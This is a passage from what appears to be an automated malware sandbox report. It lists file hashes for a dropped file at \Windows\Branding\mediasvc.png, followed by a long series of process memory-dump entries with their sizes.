                                                                        7cd323f2536490c20bfe1dcccd600e25cf697cab0d1efa8e5f01c20666f13290

                                                                        SHA512

                                                                        18bf8b774ce59db412b9fb60d7ab50347bf0a9d42ec9266df1e1c9e9d3518774d2bd30e29917a568868772f664b5382522414cd3479cc79703b417d2fcd0097f

                                                                      • \Windows\Branding\mediasvc.png
                                                                        MD5

                                                                        b88f9287f5cb18ae5c6a9bb46cab5ee7

                                                                        SHA1

                                                                        e5644bb5ec08829957d8b4b2b204c0443bba155e

                                                                        SHA256

                                                                        b1a6e49f20cf8833a11768f57401505b5063dd89a608dd160c52d52bfaad4ae9

                                                                        SHA512

                                                                        a311ad47d614511671d3f9784a8de4c8507e9cfc18fe79749a3c5be2e04a41d6c8b94ccf071d52edc78c10211df46208991e8fb57d7a1c03073a28bed207a68e

                                                                      • memory/268-172-0x0000000000000000-mapping.dmp
                                                                      • memory/268-190-0x0000000000000000-mapping.dmp
                                                                      • memory/304-62-0x0000000041354000-0x0000000041356000-memory.dmp
                                                                        Filesize

                                                                        8KB

                                                                      • memory/304-59-0x0000000041680000-0x000000004192A000-memory.dmp
                                                                        Filesize

                                                                        2.7MB

                                                                      • memory/304-63-0x0000000041356000-0x0000000041357000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/304-61-0x0000000041352000-0x0000000041354000-memory.dmp
                                                                        Filesize

                                                                        8KB

                                                                      • memory/304-64-0x0000000041357000-0x0000000041358000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/436-183-0x0000000000000000-mapping.dmp
                                                                      • memory/472-75-0x0000000000000000-mapping.dmp
                                                                      • memory/556-199-0x0000000000000000-mapping.dmp
                                                                      • memory/556-159-0x0000000000000000-mapping.dmp
                                                                      • memory/568-184-0x0000000000000000-mapping.dmp
                                                                      • memory/624-78-0x0000000000000000-mapping.dmp
                                                                      • memory/660-188-0x0000000000000000-mapping.dmp
                                                                      • memory/740-121-0x0000000000000000-mapping.dmp
                                                                      • memory/740-127-0x000000001B4B0000-0x000000001B4B1000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/740-129-0x000000001B4D0000-0x000000001B4D1000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/740-132-0x0000000002520000-0x0000000002521000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/740-131-0x000000001B760000-0x000000001B761000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/740-134-0x000000001AA04000-0x000000001AA06000-memory.dmp
                                                                        Filesize

                                                                        8KB

                                                                      • memory/740-133-0x000000001AA00000-0x000000001AA02000-memory.dmp
                                                                        Filesize

                                                                        8KB

                                                                      • memory/816-178-0x0000000000000000-mapping.dmp
                                                                      • memory/876-201-0x0000000000000000-mapping.dmp
                                                                      • memory/912-207-0x0000000019434000-0x0000000019436000-memory.dmp
                                                                        Filesize

                                                                        8KB

                                                                      • memory/912-209-0x000000001943A000-0x0000000019459000-memory.dmp
                                                                        Filesize

                                                                        124KB

                                                                      • memory/912-206-0x0000000019430000-0x0000000019432000-memory.dmp
                                                                        Filesize

                                                                        8KB

                                                                      • memory/912-202-0x0000000000000000-mapping.dmp
                                                                      • memory/920-168-0x0000000000000000-mapping.dmp
                                                                      • memory/928-142-0x0000000000000000-mapping.dmp
                                                                      • memory/928-155-0x000000001AD04000-0x000000001AD06000-memory.dmp
                                                                        Filesize

                                                                        8KB

                                                                      • memory/928-154-0x000000001AD00000-0x000000001AD02000-memory.dmp
                                                                        Filesize

                                                                        8KB

                                                                      • memory/932-179-0x0000000000000000-mapping.dmp
                                                                      • memory/944-185-0x0000000000000000-mapping.dmp
                                                                      • memory/964-167-0x0000000000000000-mapping.dmp
                                                                      • memory/1008-175-0x0000000000000000-mapping.dmp
                                                                      • memory/1036-163-0x0000000000000000-mapping.dmp
                                                                      • memory/1048-194-0x0000000000000000-mapping.dmp
                                                                      • memory/1092-200-0x0000000000000000-mapping.dmp
                                                                      • memory/1092-169-0x0000000000000000-mapping.dmp
                                                                      • memory/1152-187-0x0000000000000000-mapping.dmp
                                                                      • memory/1224-176-0x0000000000000000-mapping.dmp
                                                                      • memory/1380-195-0x0000000000000000-mapping.dmp
                                                                      • memory/1380-210-0x0000000000000000-mapping.dmp
                                                                      • memory/1388-174-0x0000000000000000-mapping.dmp
                                                                      • memory/1476-186-0x0000000000000000-mapping.dmp
                                                                      • memory/1492-161-0x0000000000000000-mapping.dmp
                                                                      • memory/1512-180-0x0000000000000000-mapping.dmp
                                                                      • memory/1520-177-0x0000000000000000-mapping.dmp
                                                                      • memory/1536-211-0x0000000000000000-mapping.dmp
                                                                      • memory/1536-173-0x0000000000000000-mapping.dmp
                                                                      • memory/1544-170-0x0000000000000000-mapping.dmp
                                                                      • memory/1600-166-0x0000000000000000-mapping.dmp
                                                                      • memory/1628-165-0x0000000000000000-mapping.dmp
                                                                      • memory/1644-189-0x0000000000000000-mapping.dmp
                                                                      • memory/1660-87-0x0000000000000000-mapping.dmp
                                                                      • memory/1660-97-0x000000001B7D0000-0x000000001B7D1000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/1660-100-0x0000000001EF0000-0x0000000001EF1000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/1660-94-0x000000001AA94000-0x000000001AA96000-memory.dmp
                                                                        Filesize

                                                                        8KB

                                                                      • memory/1660-93-0x000000001AA90000-0x000000001AA92000-memory.dmp
                                                                        Filesize

                                                                        8KB

                                                                      • memory/1660-99-0x0000000002760000-0x0000000002761000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/1660-119-0x000000001B720000-0x000000001B721000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/1660-95-0x0000000002420000-0x0000000002421000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/1660-120-0x000000001B730000-0x000000001B731000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/1660-106-0x000000001B630000-0x000000001B631000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/1668-193-0x0000000000000000-mapping.dmp
                                                                      • memory/1668-162-0x0000000000000000-mapping.dmp
                                                                      • memory/1752-164-0x0000000000000000-mapping.dmp
                                                                      • memory/2020-171-0x0000000000000000-mapping.dmp
                                                                      • memory/2020-196-0x0000000000000000-mapping.dmp
                                                                      • memory/2044-82-0x0000000001F30000-0x0000000001F31000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/2044-74-0x000000001B6D0000-0x000000001B6D1000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/2044-101-0x000000000261A000-0x0000000002639000-memory.dmp
                                                                        Filesize

                                                                        124KB

                                                                      • memory/2044-84-0x000000001C160000-0x000000001C161000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/2044-72-0x0000000002614000-0x0000000002616000-memory.dmp
                                                                        Filesize

                                                                        8KB

                                                                      • memory/2044-71-0x0000000002610000-0x0000000002612000-memory.dmp
                                                                        Filesize

                                                                        8KB

                                                                      • memory/2044-70-0x00000000025B0000-0x00000000025B1000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/2044-85-0x000000001C4A0000-0x000000001C4A1000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/2044-69-0x00000000024D0000-0x00000000024D1000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/2044-68-0x000000001AA90000-0x000000001AA91000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/2044-67-0x0000000002490000-0x0000000002491000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/2044-66-0x000007FEFBE41000-0x000007FEFBE43000-memory.dmp
                                                                        Filesize

                                                                        8KB

                                                                      • memory/2044-65-0x0000000000000000-mapping.dmp
                                                                      • memory/2044-158-0x000000001C790000-0x000000001C791000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/2044-86-0x0000000002720000-0x0000000002721000-memory.dmp
                                                                        Filesize

                                                                        4KB